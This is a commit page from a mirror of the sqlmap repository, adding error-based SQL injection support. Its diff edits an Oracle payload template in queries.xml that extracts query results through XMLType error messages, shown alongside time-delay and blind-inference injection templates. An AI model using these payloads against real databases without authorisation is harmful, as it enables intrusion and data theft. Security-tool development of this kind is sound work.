PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2026-01-05 14:19:01 +00:00
Code Issues Projects Releases Wiki Activity

first successfull run of error based sqlmap in history :). tested --banner, --current-user, --current-db on 4 major DBMSes. still hidden from users (turn on flag error in getValue() in inject.py)

Browse Source
This commit is contained in:
Miroslav Stampar
2010-10-19 12:02:04 +00:00
parent 0c286d8db2
commit 6a8b1046d4
4 changed files with 58 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
xml/queries.xml
View File

@@ -91,7 +91,7 @@
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
<substring query="SUBSTR((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
<error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(%s)||CHR(58)||CHR(58)||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+)::"/>
<error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(%s)||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+)&amp;quot;"/>
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
<current_user query="SELECT USER FROM DUAL"/>